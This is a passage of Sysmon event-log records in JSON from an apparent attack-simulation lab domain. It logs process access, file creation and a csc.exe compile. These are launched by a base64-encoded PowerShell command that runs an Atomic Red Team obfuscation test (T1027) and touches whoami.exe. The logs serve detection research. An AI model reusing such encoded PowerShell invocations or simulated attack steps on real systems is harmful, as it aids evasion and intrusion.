05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010E3DB0700}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010E3DB0700}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:37.421\r\nProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.dll\r\nCreationUtcTime: 2020-08-01 05:52:37.421","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:37.421","ProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.dll","CreationUtcTime":"2020-08-01 05:52:37.421","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:37.421","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","ProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline","CreationUtcTime":"2020-08-01 05:52:37.421","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.435\r\nProcessGuid: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nProcessId: 2708\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.435","ProcessGuid":"{A837DB8D-0325-5F25-0000-00101ADF0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nTargetProcessId: 2708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+bbb1d100(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\